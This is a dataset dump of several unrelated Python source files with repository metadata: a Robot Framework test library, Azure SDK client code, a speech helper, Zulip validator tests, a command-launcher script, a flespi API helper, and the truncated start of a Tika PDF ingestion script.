text
stringlengths 4
1.02M
| meta
dict |
|---|---|
import time
def busy_sleep(seconds):
    """Busy-wait (burn CPU without yielding) for roughly ``seconds`` seconds.

    :param seconds: duration to spin; accepts ints, floats, and numeric
        strings.
    Fix: the original used ``int(seconds)``, which truncated fractional
    durations (``busy_sleep(0.5)`` returned immediately) and raised
    ``ValueError`` for strings like ``"1.5"``.  ``float`` handles every
    value ``int`` accepted, plus fractional ones.
    """
    deadline = time.time() + float(seconds)
    while time.time() < deadline:
        pass
def swallow_exception():
    """Block forever while suppressing any exception raised into this frame.

    The bare ``except:`` is deliberate here: it also catches
    ``KeyboardInterrupt``, so an exception injected asynchronously (e.g. by
    a signal handler) terminates the loop silently and the call returns.
    NOTE(review): presumably test-library data for verifying forced-stop
    behavior (the metadata path mentions ``stopping_with_signal``) — do not
    "fix" the broad except without checking the consuming tests.
    """
    try:
        # Spin until an exception is raised into this frame from outside.
        while True:
            pass
    except:
        pass
|
{
"content_hash": "87107165c98879d2108843c06feaf83b",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 41,
"avg_line_length": 16.071428571428573,
"alnum_prop": 0.5466666666666666,
"repo_name": "Senseg/robotframework",
"id": "00291c26454d33bf67a59504497cae0061fc7a79",
"size": "225",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "atest/testdata/running/stopping_with_signal/Library.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "716"
},
{
"name": "Java",
"bytes": "48873"
},
{
"name": "JavaScript",
"bytes": "149654"
},
{
"name": "Python",
"bytes": "1637427"
},
{
"name": "Shell",
"bytes": "1323"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class Provider(Model):
    """Resource provider information.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: The provider ID.
    :vartype id: str
    :param namespace: The namespace of the resource provider.
    :type namespace: str
    :ivar registration_state: The registration state of the provider.
    :vartype registration_state: str
    :ivar resource_types: The collection of provider resource types.
    :vartype resource_types: list of :class:`ProviderResourceType
     <azure.mgmt.resource.resources.v2016_09_01.models.ProviderResourceType>`
    """

    # Server-populated (read-only) fields are rejected on outbound requests.
    _validation = {
        'id': {'readonly': True},
        'registration_state': {'readonly': True},
        'resource_types': {'readonly': True},
    }

    # Maps Python attribute names to wire (JSON) keys and msrest types.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'namespace': {'key': 'namespace', 'type': 'str'},
        'registration_state': {'key': 'registrationState', 'type': 'str'},
        'resource_types': {'key': 'resourceTypes', 'type': '[ProviderResourceType]'},
    }

    def __init__(self, namespace=None):
        # Fix: initialize the msrest Model base class so its serialization
        # bookkeeping is set up; the original skipped this call.
        super(Provider, self).__init__()
        self.id = None
        self.namespace = namespace
        self.registration_state = None
        self.resource_types = None
|
{
"content_hash": "e0ed87dc18068d763f0dee42a180e8b9",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 85,
"avg_line_length": 33.94736842105263,
"alnum_prop": 0.6364341085271318,
"repo_name": "v-iam/azure-sdk-for-python",
"id": "a6203659a6beb364d8dbb5fc6ee3125c81bac287",
"size": "1764",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-resource/azure/mgmt/resource/resources/v2016_09_01/models/provider.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19856874"
}
],
"symlink_target": ""
}
|
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._code_containers_operations import build_create_or_update_request, build_delete_request, build_get_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
# NOTE(review): auto-generated Azure SDK client code — statement order and
# generated idioms are preserved byte-for-byte; only comments were added.
class CodeContainersOperations:
    """CodeContainersOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.machinelearningservices.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace
    def list(
        self,
        resource_group_name: str,
        workspace_name: str,
        skip: Optional[str] = None,
        **kwargs: Any
    ) -> AsyncIterable["_models.CodeContainerResourceArmPaginatedResult"]:
        """List containers.

        List containers.

        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param workspace_name: Name of Azure Machine Learning workspace.
        :type workspace_name: str
        :param skip: Continuation token for pagination.
        :type skip: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either CodeContainerResourceArmPaginatedResult or the
         result of cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.CodeContainerResourceArmPaginatedResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        api_version = kwargs.pop('api_version', "2022-10-01")  # type: str

        cls = kwargs.pop('cls', None)  # type: ClsType["_models.CodeContainerResourceArmPaginatedResult"]
        # Caller-supplied error_map entries override these defaults.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            # First page: build from the operation's URL template.
            # Later pages: the service-supplied next_link replaces the template.
            if not next_link:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    resource_group_name=resource_group_name,
                    workspace_name=workspace_name,
                    api_version=api_version,
                    skip=skip,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    resource_group_name=resource_group_name,
                    workspace_name=workspace_name,
                    api_version=api_version,
                    skip=skip,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            # Returns (continuation token or None, async iterable of page items).
            deserialized = self._deserialize("CodeContainerResourceArmPaginatedResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            # Fetch one page; only HTTP 200 is a success for this operation.
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
                request,
                stream=False,
                **kwargs
            )
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/codes"}  # type: ignore

    @distributed_trace_async
    async def delete(  # pylint: disable=inconsistent-return-statements
        self,
        resource_group_name: str,
        workspace_name: str,
        name: str,
        **kwargs: Any
    ) -> None:
        """Delete container.

        Delete container.

        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param workspace_name: Name of Azure Machine Learning workspace.
        :type workspace_name: str
        :param name: Container name. This is case-sensitive.
        :type name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        api_version = kwargs.pop('api_version', "2022-10-01")  # type: str

        request = build_delete_request(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
            workspace_name=workspace_name,
            name=name,
            api_version=api_version,
            template_url=self.delete.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
            request,
            stream=False,
            **kwargs
        )
        response = pipeline_response.http_response

        # 204 is returned when the container did not exist; both are success.
        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    delete.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/codes/{name}"}  # type: ignore

    @distributed_trace_async
    async def get(
        self,
        resource_group_name: str,
        workspace_name: str,
        name: str,
        **kwargs: Any
    ) -> "_models.CodeContainer":
        """Get container.

        Get container.

        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param workspace_name: Name of Azure Machine Learning workspace.
        :type workspace_name: str
        :param name: Container name. This is case-sensitive.
        :type name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: CodeContainer, or the result of cls(response)
        :rtype: ~azure.mgmt.machinelearningservices.models.CodeContainer
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.CodeContainer"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        api_version = kwargs.pop('api_version', "2022-10-01")  # type: str

        request = build_get_request(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
            workspace_name=workspace_name,
            name=name,
            api_version=api_version,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
            request,
            stream=False,
            **kwargs
        )
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('CodeContainer', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/codes/{name}"}  # type: ignore

    @distributed_trace_async
    async def create_or_update(
        self,
        resource_group_name: str,
        workspace_name: str,
        name: str,
        body: "_models.CodeContainer",
        **kwargs: Any
    ) -> "_models.CodeContainer":
        """Create or update container.

        Create or update container.

        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param workspace_name: Name of Azure Machine Learning workspace.
        :type workspace_name: str
        :param name: Container name. This is case-sensitive.
        :type name: str
        :param body: Container entity to create or update.
        :type body: ~azure.mgmt.machinelearningservices.models.CodeContainer
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: CodeContainer, or the result of cls(response)
        :rtype: ~azure.mgmt.machinelearningservices.models.CodeContainer
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.CodeContainer"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        api_version = kwargs.pop('api_version', "2022-10-01")  # type: str
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        _json = self._serialize.body(body, 'CodeContainer')

        request = build_create_or_update_request(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
            workspace_name=workspace_name,
            name=name,
            api_version=api_version,
            content_type=content_type,
            json=_json,
            template_url=self.create_or_update.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
            request,
            stream=False,
            **kwargs
        )
        response = pipeline_response.http_response

        # 200 = updated, 201 = created.
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        # Both branches deserialize identically; kept as two branches to
        # match the code generator's output.
        if response.status_code == 200:
            deserialized = self._deserialize('CodeContainer', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('CodeContainer', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    create_or_update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/codes/{name}"}  # type: ignore
|
{
"content_hash": "495c774575655a019e0456fbc220e75b",
"timestamp": "",
"source": "github",
"line_count": 331,
"max_line_length": 209,
"avg_line_length": 42.41087613293051,
"alnum_prop": 0.6441088474141615,
"repo_name": "Azure/azure-sdk-for-python",
"id": "9936d55e256bf148d79fb6059c2fede07e8c4b54",
"size": "14538",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2022_10_01/aio/operations/_code_containers_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
import speech_recognition as sr
from gtts import gTTS
import pygame
class Speech:
    """Text-to-speech (gTTS + pygame playback) and speech-to-text
    (Google Speech Recognition) helper."""

    def __init__(self):
        # One Recognizer instance is shared by all listen() calls.
        self.r = sr.Recognizer()
        pygame.mixer.init()

    def create_talk(self, str, fname, l='en'):
        """Synthesize speech for the given text and save it to (fname).mp3.

        parameters:
            str - text to synthesize (NOTE: the parameter name shadows the
                  builtin ``str``; kept unchanged so keyword callers keep
                  working)
            fname - filename for output (without '.mp3')
            l - language code (default 'en')
        """
        tts = gTTS(text=str, lang=l)
        tts.save(fname + ".mp3")

    def listen(self, time):
        """Listen on the microphone for up to (time) seconds.

        parameters:
            time - recording time in seconds
        Returns the recognized text, or "fail" when the audio could not be
        understood or the recognition service was unreachable.
        """
        with sr.Microphone() as source:
            self.r.adjust_for_ambient_noise(source)
            audio = self.r.listen(source, 0, time)
            try:
                res = self.r.recognize_google(audio)
                return res
            except (sr.UnknownValueError, sr.RequestError):
                # Fix: the original bare `except:` also swallowed
                # KeyboardInterrupt and programming errors; only the two
                # recognition failures documented by SpeechRecognition are
                # treated as "fail".
                return "fail"

    def play_talk(self, fname):
        """Play (fname).mp3 through the pygame mixer.

        parameters:
            fname - mp3-file with speech (without '.mp3')
        """
        pygame.mixer.music.load(fname + ".mp3")
        pygame.mixer.music.play()
|
{
"content_hash": "a09ec9b11f3d75ce5435b837cfa3fd86",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 63,
"avg_line_length": 22.440677966101696,
"alnum_prop": 0.513595166163142,
"repo_name": "HackRoboy/EmotionGame",
"id": "77ef4004cf3a035fc572f2a9aba9b5074bc65bb3",
"size": "1324",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "SpeechPython/speech.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "407"
},
{
"name": "C++",
"bytes": "21132"
},
{
"name": "Python",
"bytes": "4538"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from zerver.decorator import \
REQ, has_request_variables, RequestVariableMissingError, \
RequestVariableConversionError, JsonableError
from zerver.lib.validator import (
check_string, check_dict, check_bool, check_int, check_list
)
import ujson
class DecoratorTestCase(TestCase):
    """Tests for the REQ request-variable machinery in zerver.decorator."""

    def test_REQ_converter(self):
        # A converter may raise ValueError (surfaced to the caller as
        # RequestVariableConversionError) or raise JsonableError directly.
        def my_converter(data):
            lst = ujson.loads(data)
            if not isinstance(lst, list):
                raise ValueError('not a list')
            if 13 in lst:
                raise JsonableError('13 is an unlucky number!')
            return lst

        @has_request_variables
        def get_total(request, numbers=REQ(converter=my_converter)):
            return sum(numbers)

        class Request(object):
            # Minimal stand-in for a Django request; REQ reads request.REQUEST.
            REQUEST = {} # type: Dict[str, str]

        request = Request()

        # Missing variable -> RequestVariableMissingError.
        with self.assertRaises(RequestVariableMissingError):
            get_total(request)

        # Converter ValueError -> RequestVariableConversionError.
        request.REQUEST['numbers'] = 'bad_value'
        with self.assertRaises(RequestVariableConversionError) as cm:
            get_total(request)
        self.assertEqual(str(cm.exception), "Bad value for 'numbers': bad_value")

        # JsonableError raised inside the converter propagates unchanged.
        request.REQUEST['numbers'] = ujson.dumps([2, 3, 5, 8, 13, 21])
        with self.assertRaises(JsonableError) as cm:
            get_total(request)
        self.assertEqual(str(cm.exception), "13 is an unlucky number!")

        # Happy path.
        request.REQUEST['numbers'] = ujson.dumps([1, 2, 3, 4, 5, 6])
        result = get_total(request)
        self.assertEqual(result, 21)

    def test_REQ_validator(self):
        # Unlike a converter, a validator receives already-parsed JSON.
        @has_request_variables
        def get_total(request, numbers=REQ(validator=check_list(check_int))):
            return sum(numbers)

        class Request(object):
            REQUEST = {} # type: Dict[str, str]

        request = Request()

        with self.assertRaises(RequestVariableMissingError):
            get_total(request)

        # Non-JSON input fails before the validator runs.
        request.REQUEST['numbers'] = 'bad_value'
        with self.assertRaises(JsonableError) as cm:
            get_total(request)
        self.assertEqual(str(cm.exception), 'argument "numbers" is not valid json.')

        # Validator failure reports the offending index.
        request.REQUEST['numbers'] = ujson.dumps([1, 2, "what?", 4, 5, 6])
        with self.assertRaises(JsonableError) as cm:
            get_total(request)
        self.assertEqual(str(cm.exception), 'numbers[2] is not an integer')

        request.REQUEST['numbers'] = ujson.dumps([1, 2, 3, 4, 5, 6])
        result = get_total(request)
        self.assertEqual(result, 21)
class ValidatorTestCase(TestCase):
    """Exercises the zerver.lib.validator check_* helpers directly.

    Each check_* function returns None on success or an error string
    describing the first failure it finds.
    """

    def test_check_string(self):
        self.assertEqual(check_string('x', "hello"), None)
        self.assertEqual(check_string('x', 4), 'x is not a string')

    def test_check_bool(self):
        self.assertEqual(check_bool('x', True), None)
        self.assertEqual(check_bool('x', 4), 'x is not a boolean')

    def test_check_int(self):
        self.assertEqual(check_int('x', 5), None)
        self.assertEqual(check_int('x', [{}]), 'x is not an integer')

    def test_check_list(self):
        strings = check_list(check_string)
        self.assertEqual(strings('x', 999), 'x is not a list')
        self.assertEqual(strings('x', ["hello", 5]), 'x[1] is not a string')

        # Nested lists report the full index path.
        nested = check_list(check_list(check_string))
        self.assertEqual(nested('x', [["yo"], ["hello", "goodbye", 5]]),
                         'x[1][2] is not a string')

        # An exact length can be enforced.
        pair = check_list(check_string, length=2)
        self.assertEqual(pair('x', ["hello", "goodbye", "hello again"]),
                         'x should have exactly 2 items')

    def test_check_dict(self):
        keys = [
            ('names', check_list(check_string)),
            ('city', check_string),
        ]
        validate = check_dict(keys)

        self.assertEqual(validate('x', {'names': ['alice', 'bob'],
                                        'city': 'Boston'}), None)
        self.assertEqual(validate('x', 999), 'x is not a dict')
        self.assertEqual(validate('x', {}), 'names key is missing from x')
        self.assertEqual(validate('x', {'names': ['alice', 'bob', {}]}),
                         'x["names"][2] is not a string')
        self.assertEqual(validate('x', {'names': ['alice', 'bob'],
                                        'city': 5}),
                         'x["city"] is not a string')

    def test_encapsulation(self):
        # There might be situations where we want deep validation, but the
        # error message should be customized.  This is an example.
        def check_person(val):
            if check_dict([
                ['name', check_string],
                ['age', check_int],
            ])('_', val):
                return 'This is not a valid person'

        self.assertEqual(check_person({'name': 'King Lear', 'age': 42}), None)
        self.assertEqual(check_person('misconfigured data'),
                         'This is not a valid person')
|
{
"content_hash": "b9f6670405c97d29815bbf196a5f4c13",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 84,
"avg_line_length": 31.790419161676645,
"alnum_prop": 0.562817856470145,
"repo_name": "ryansnowboarder/zulip",
"id": "bc06ea374e5ec054f57fd79f4504c7b3961c4ae1",
"size": "5333",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "zerver/tests/test_decorators.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "164"
},
{
"name": "CSS",
"bytes": "182566"
},
{
"name": "CoffeeScript",
"bytes": "18435"
},
{
"name": "Groovy",
"bytes": "5515"
},
{
"name": "HTML",
"bytes": "385288"
},
{
"name": "JavaScript",
"bytes": "1571750"
},
{
"name": "Nginx",
"bytes": "1228"
},
{
"name": "PHP",
"bytes": "18930"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "383634"
},
{
"name": "Puppet",
"bytes": "95624"
},
{
"name": "Python",
"bytes": "1863879"
},
{
"name": "Ruby",
"bytes": "255867"
},
{
"name": "Shell",
"bytes": "32357"
}
],
"symlink_target": ""
}
|
import os # needed to start shell commands from python
import argparse # parsing commandline arguments
import sys
import config # import config.py file
import dataaccess # class which is responsible for manipulating the commands_file
import autoconfig #class which can determine some important things and create config file
class CommandLine:
    """Resolves a command from the commands file and dispatches an action.

    Instantiating the class performs the action immediately (find / add /
    delete / run), matching the original design.  IOError from the data
    layer propagates to the caller.
    """

    def __init__(self, commands_file, action, parameters):
        self.action = action
        # The original wrapped this in `try/except: raise`, which is a no-op;
        # any IOError still propagates to the caller unchanged.
        self.data_access = dataaccess.DataAccess(commands_file)
        self.parameters = parameters
        self.command = parameters  # parameters used to find the command
        self.command.insert(0, config.system)  # first parameter: system name
        self.command = self.find_command()  # resolve via commands_file
        cases = {
            "find": self.print_command,
            "add": self.add_command,
            "delete": self.del_command,
            "run": self.run_command,
        }
        cases[action]()

    def find_command(self):
        """Look up the command and prepend its type prefix (and sudo) if any.

        Fix: the original loop broke out on the *first* dictionary entry no
        matter what (both branches ended in ``break``), so only one command
        type was ever considered.  The for/else below scans all configured
        types and falls back to the bare command when none matches.
        """
        command = self.data_access.find(self.command)
        for command_type, command_prefix in config.types.items():
            if command_type.decode('utf-8') == command[0] and command_prefix:
                command = command_prefix + " " + command[1]
                break
        else:
            # No type with a prefix matched: use the command as stored.
            command = command[1]
        if config.sudoEnable:
            command = "sudo " + command
        return command

    def print_command(self):
        print(self.command)

    def add_command(self):
        # Not implemented yet.
        pass

    def del_command(self):
        # Not implemented yet.
        pass

    def run_command(self):
        os.system(self.command)
if __name__ == "__main__":
    # On the very first run, generate a config file before doing anything else.
    if config.first_run:
        print("\nFirst run, running autoconfig")
        print("You will be able to change those settings in ./config.py file.")
        ac = autoconfig.Autoconfig()
        ac.replace_config_file()
        config = reload(config)  # NOTE(review): builtin reload is Python 2 only

    parser = argparse.ArgumentParser(description='Comfortable configurator.')
    parser.add_argument('--autoconfig', action='store_true', dest='autoconfig',
                        default=config.first_run,
                        help='Run autoconfig script. Other parameters are omitted.')
    parser.add_argument('-c', '--commands-file', dest='commands_file',
                        default=config.commands_file,
                        help='Override the path of commands file')
    parser.add_argument('-f', '--find',
                        nargs=argparse.REMAINDER,
                        help='Edit command that was found using remaining parameters')
    parser.add_argument('-a', '--add',
                        nargs=argparse.REMAINDER,
                        help='Add command that is going to be found using remaining parameters')
    parser.add_argument('-d', '--delete',
                        nargs=argparse.REMAINDER,
                        help='Delete command that was found using remaining parameters')
    args, command = parser.parse_known_args()
    action = ""

    # No arguments at all: show usage and exit with an error code.
    if len(sys.argv) == 1:
        print(parser.format_help())
        sys.exit(1)

    if args.autoconfig:
        ac = autoconfig.Autoconfig()
        ac.ask_user()
        ac.replace_config_file()
        config = reload(config)
    else:
        # Any leftover positional arguments mean "run this command".
        if command:
            args.command = command
            action = "run"
        elif args.find:
            action = "find"
            args.command = args.find
        elif args.add:
            action = "add"
            args.command = args.add
        elif args.delete:
            action = "delete"
            args.command = args.delete

    try:
        command_line = CommandLine(args.commands_file, action, args.command)
    except IOError as e:
        # Fix: the original formatted e.message, which is deprecated and
        # absent on Python 3; formatting the exception itself works on both.
        print("Comfi encountered problems with commands file: %s" % e)
    except AttributeError as e:
        # args.command is unset on the autoconfig path; report it politely.
        print("Comfi encountered problems with parameters: %s" % e)
    except Exception as e:
        # Fix: was `except BaseException`, which also swallowed SystemExit
        # and KeyboardInterrupt.
        print("Comfi stopped working because of: %s" % e)
|
{
"content_hash": "588e2378dd528a7c0b060ac384f60357",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 107,
"avg_line_length": 34.743801652892564,
"alnum_prop": 0.5685061845861085,
"repo_name": "czerwonyd/comfi",
"id": "47242fab8c68f2bdc789286daed087e37fc4e695",
"size": "4228",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "comfi.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9424"
}
],
"symlink_target": ""
}
|
import io
import urllib3
""" This module is pulled out from auto-generated swagger python client for flespi gateway"""
class ApiException(Exception):
    """Raised when a flespi REST call fails.

    Can be built either from an explicit status/reason pair or from a
    RESTResponse-like object (``http_resp``), in which case the status,
    reason, body and headers are copied from the response.
    """

    def __init__(self, status=None, reason=None, http_resp=None):
        if http_resp:
            self.status = http_resp.status
            self.reason = http_resp.reason
            self.body = http_resp.data
            self.headers = http_resp.getheaders()
        else:
            self.status = status
            self.reason = reason
            self.body = None
            self.headers = None

    def __str__(self):
        """Render status and reason, plus headers/body when present."""
        parts = ["({0})\n".format(self.status),
                 "Reason: {0}\n".format(self.reason)]
        if self.headers:
            parts.append("HTTP response headers: {0}\n".format(self.headers))
        if self.body:
            parts.append("HTTP response body: {0}\n".format(self.body))
        return "".join(parts)
class RESTResponse(io.IOBase):
    """File-like wrapper exposing a urllib3 response's common fields."""

    def __init__(self, resp):
        self.urllib3_response = resp
        # Mirror the fields consumers read most often.
        for field in ("status", "reason", "data"):
            setattr(self, field, getattr(resp, field))

    def getheaders(self):
        """Return all response headers as a dictionary-like object."""
        return self.urllib3_response.getheaders()

    def getheader(self, name, default=None):
        """Return the named response header, or *default* when absent."""
        return self.urllib3_response.getheader(name, default)
def get_messages_request(flespi_recv_obj, query_params):
    """Perform an authorized GET against the receiver's target URL.

    Returns a RESTResponse with its body decoded as UTF-8 text.  Raises
    ApiException on SSL failure (status 0) or any non-200 HTTP status.
    """
    headers = {'Authorization': flespi_recv_obj.auth_header}
    headers.setdefault('Content-Type', 'application/json')
    try:
        raw = flespi_recv_obj.pool_manager.request('GET', flespi_recv_obj.target_url,
                                                   fields=query_params,
                                                   headers=headers)
    except urllib3.exceptions.SSLError as e:
        raise ApiException(status=0,
                           reason="{0}\n{1}".format(type(e).__name__, str(e)))
    response = RESTResponse(raw)
    response.data = response.data.decode('utf8')
    if response.status != 200:
        raise ApiException(http_resp=response)
    return response
|
{
"content_hash": "7d8d61bbba932460e95ec8e89b9befd7",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 93,
"avg_line_length": 28.911392405063292,
"alnum_prop": 0.5621716287215411,
"repo_name": "janbartnitsky/flespi_receiver",
"id": "2a382bf6b4876e3c98881c6197423f25c2c9075f",
"size": "2284",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "flespi_receiver/swagger_api_reduced.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "460"
},
{
"name": "Python",
"bytes": "19943"
}
],
"symlink_target": ""
}
|
"""
Test script for ingesting PDFs from the file system using Tika
Some code directly ripped from Katrina's autonomy work
"""
import json
import re
import os
from celery import shared_task, task
TIKA_ENDPOINT="http://0.0.0.0:9998"
ELASTICSEARCH_HOST="http://0.0.0.0:9200"
from elasticsearch import Elasticsearch
from tika.tika import parse1 as parse
from django.db import IntegrityError
from task_manager.models import CeleryTask
def process_content(content_str, stopwords):
    """Produce a cleaned content string and flag known keyword phrases.

    Lower-cases and tokenizes *content_str*, strips non-alphabetic
    characters from every token, drops stop words, and — in the same
    pass — records which two-word keyword phrases occur.

    :param content_str: raw document text.
    :param stopwords: iterable of tokens to exclude from the cleaned output.
    :return: ``(cleaned_text, features)`` where *features* maps each known
        keyword phrase to 1 if it was seen, else 0.
    """
    cleaned = []
    features = {
        "pure teleoperation": 0,
        "leader follower": 0,
        "obstacle detection": 0,
        "obstacle avoidance": 0,
        "route planning": 0,
        "mission planning": 0,
        "target recognition": 0,
        "autonomous mobility": 0,
        "feature identification": 0,
        "situational awareness": 0,
        "collaborative systems": 0,
        "adaptive behavior": 0,
        "tactical behavior": 0,
    }
    strip_non_alpha = re.compile("[^a-zA-Z]")  # hoisted out of the loop
    last_token = ''
    for raw_token in content_str.lower().split():
        token = strip_non_alpha.sub('', raw_token)
        # Fix: purely numeric/punctuation tokens became '' after stripping
